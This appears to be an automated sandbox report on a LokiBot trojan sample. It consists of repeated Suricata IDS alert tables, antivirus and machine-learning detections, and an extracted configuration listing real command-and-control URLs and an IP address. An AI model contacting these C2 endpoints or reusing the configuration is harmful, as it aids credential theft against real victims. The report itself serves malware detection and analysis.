2024-11-22T17:39:46.764115+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:48.566331+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:50.496975+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:52.341897+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:54.151907+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:55.765985+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:57.517015+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:59.228879+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:40:01.069978+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:02.745174+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:04.526328+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:06.269586+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:08.104776+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:09.891749+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:11.557939+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:13.394137+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:15.065652+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:16.777601+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:18.529455+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:20.330214+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:22.279856+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:24.138359+0100	2024318	1	Malware Command and Control Activity Detected	192.168.2.4	50000	94.156.177.41	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:20.385794+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:25.419739+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:27.183872+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:29.035149+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.844447+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.663838+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:34.331046+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:36.401062+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:38.111286+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.948025+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.659082+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.413430+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:45.199702+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.970645+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.693877+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.493985+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:52.309427+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:54.159922+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:56.007119+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:57.847693+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.730255+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.391645+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:03.187495+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.874345+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.624697+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:08.251882+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:10.075035+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.694205+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.452854+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:15.106129+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:16.873576+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.772634+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.515914+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:22.314600+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:24.067071+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.697513+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.435691+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:29.277428+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.980502+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.779202+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.454700+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:36.638264+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:38.319161+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:40.156593+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.832002+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.599899+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:45.307094+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:47.159997+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:49.169189+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.892509+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.742489+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.532238+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:56.154638+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.905221+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.617555+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.461227+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:03.120405+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.910450+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.653374+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.480379+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:10.283380+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.940390+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.780404+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.455772+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:17.167831+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.923857+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.873102+0100	2021641	1	A Network Trojan was detected	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.672655+0100	2021641	1	A Network Trojan was detected	192.168.2.4	50000	94.156.177.41	80	TCP

ETPRO MALWARE LokiBot Checkin M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T17:38:20.385794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49733	94.156.177.41	80	TCP
2024-11-22T17:38:22.053197+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49735	94.156.177.41	80	TCP
2024-11-22T17:38:23.667763+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49736	94.156.177.41	80	TCP
2024-11-22T17:38:25.419739+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49738	94.156.177.41	80	TCP
2024-11-22T17:38:27.183872+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49739	94.156.177.41	80	TCP
2024-11-22T17:38:29.035149+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49740	94.156.177.41	80	TCP
2024-11-22T17:38:30.844447+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49741	94.156.177.41	80	TCP
2024-11-22T17:38:32.663838+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49743	94.156.177.41	80	TCP
2024-11-22T17:38:34.331046+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49745	94.156.177.41	80	TCP
2024-11-22T17:38:36.401062+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49748	94.156.177.41	80	TCP
2024-11-22T17:38:38.111286+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49749	94.156.177.41	80	TCP
2024-11-22T17:38:39.948025+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49751	94.156.177.41	80	TCP
2024-11-22T17:38:41.659082+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49753	94.156.177.41	80	TCP
2024-11-22T17:38:43.413430+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49754	94.156.177.41	80	TCP
2024-11-22T17:38:45.199702+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49755	94.156.177.41	80	TCP
2024-11-22T17:38:46.970645+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49756	94.156.177.41	80	TCP
2024-11-22T17:38:48.693877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49757	94.156.177.41	80	TCP
2024-11-22T17:38:50.493985+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49758	94.156.177.41	80	TCP
2024-11-22T17:38:52.309427+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49759	94.156.177.41	80	TCP
2024-11-22T17:38:54.159922+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49760	94.156.177.41	80	TCP
2024-11-22T17:38:56.007119+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.41	80	TCP
2024-11-22T17:38:57.847693+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49768	94.156.177.41	80	TCP
2024-11-22T17:38:59.730255+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49769	94.156.177.41	80	TCP
2024-11-22T17:39:01.391645+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49775	94.156.177.41	80	TCP
2024-11-22T17:39:03.187495+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49781	94.156.177.41	80	TCP
2024-11-22T17:39:04.874345+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.156.177.41	80	TCP
2024-11-22T17:39:06.624697+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49788	94.156.177.41	80	TCP
2024-11-22T17:39:08.251882+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49794	94.156.177.41	80	TCP
2024-11-22T17:39:10.075035+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49800	94.156.177.41	80	TCP
2024-11-22T17:39:11.694205+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49806	94.156.177.41	80	TCP
2024-11-22T17:39:13.452854+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49807	94.156.177.41	80	TCP
2024-11-22T17:39:15.106129+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49814	94.156.177.41	80	TCP
2024-11-22T17:39:16.873576+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49820	94.156.177.41	80	TCP
2024-11-22T17:39:18.772634+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49826	94.156.177.41	80	TCP
2024-11-22T17:39:20.515914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49830	94.156.177.41	80	TCP
2024-11-22T17:39:22.314600+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49834	94.156.177.41	80	TCP
2024-11-22T17:39:24.067071+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49839	94.156.177.41	80	TCP
2024-11-22T17:39:25.697513+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49845	94.156.177.41	80	TCP
2024-11-22T17:39:27.435691+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49851	94.156.177.41	80	TCP
2024-11-22T17:39:29.277428+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49853	94.156.177.41	80	TCP
2024-11-22T17:39:30.980502+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49858	94.156.177.41	80	TCP
2024-11-22T17:39:32.779202+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49864	94.156.177.41	80	TCP
2024-11-22T17:39:34.454700+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.41	80	TCP
2024-11-22T17:39:36.638264+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.41	80	TCP
2024-11-22T17:39:38.319161+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49878	94.156.177.41	80	TCP
2024-11-22T17:39:40.156593+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49883	94.156.177.41	80	TCP
2024-11-22T17:39:41.832002+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49889	94.156.177.41	80	TCP
2024-11-22T17:39:43.599899+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49894	94.156.177.41	80	TCP
2024-11-22T17:39:45.307094+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49898	94.156.177.41	80	TCP
2024-11-22T17:39:47.159997+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49902	94.156.177.41	80	TCP
2024-11-22T17:39:49.169189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49907	94.156.177.41	80	TCP
2024-11-22T17:39:50.892509+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49913	94.156.177.41	80	TCP
2024-11-22T17:39:52.742489+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49917	94.156.177.41	80	TCP
2024-11-22T17:39:54.532238+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49922	94.156.177.41	80	TCP
2024-11-22T17:39:56.154638+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49926	94.156.177.41	80	TCP
2024-11-22T17:39:57.905221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.41	80	TCP
2024-11-22T17:39:59.617555+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49937	94.156.177.41	80	TCP
2024-11-22T17:40:01.461227+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.41	80	TCP
2024-11-22T17:40:03.120405+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49945	94.156.177.41	80	TCP
2024-11-22T17:40:04.910450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49951	94.156.177.41	80	TCP
2024-11-22T17:40:06.653374+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49957	94.156.177.41	80	TCP
2024-11-22T17:40:08.480379+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49961	94.156.177.41	80	TCP
2024-11-22T17:40:10.283380+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.41	80	TCP
2024-11-22T17:40:11.940390+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49970	94.156.177.41	80	TCP
2024-11-22T17:40:13.780404+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49976	94.156.177.41	80	TCP
2024-11-22T17:40:15.455772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49981	94.156.177.41	80	TCP
2024-11-22T17:40:17.167831+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49984	94.156.177.41	80	TCP
2024-11-22T17:40:18.923857+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49990	94.156.177.41	80	TCP
2024-11-22T17:40:20.873102+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49995	94.156.177.41	80	TCP
2024-11-22T17:40:22.672655+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50000	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://94.156.177.41/maxzi/five/fre.php	Avira URL Cloud: Label: malware
Source: 94.156.177.41/maxzi/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49745
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 94.156.177.41:80
